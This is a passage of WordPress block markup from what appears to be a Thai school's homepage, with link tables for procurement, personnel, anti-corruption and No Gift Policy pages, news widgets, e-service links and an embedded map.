900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=840\" data-type=\"page\" data-id=\"840\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=851\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=855\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\">รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=716\" data-type=\"page\" data-id=\"716\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"900\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=680\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=708\" data-type=\"page\" data-id=\"708\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=828\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=831\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=836\">รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=1010\" data-type=\"page\" data-id=\"1010\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=1016\" data-type=\"page\" data-id=\"1016\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_74522c-22\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_df8487-4e\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_df8487-4e\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8c5230-93\",\"tabCount\":2,\"currentTab\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8c5230-93 kt-tabs-has-2-tabs kt-active-tab-2 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"_c20813-1f\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab_c20813-1f\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=700\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"_cc83b8-a1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab_cc83b8-a1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://slp.ssk.in.th/slweb/\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/smss/index.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img 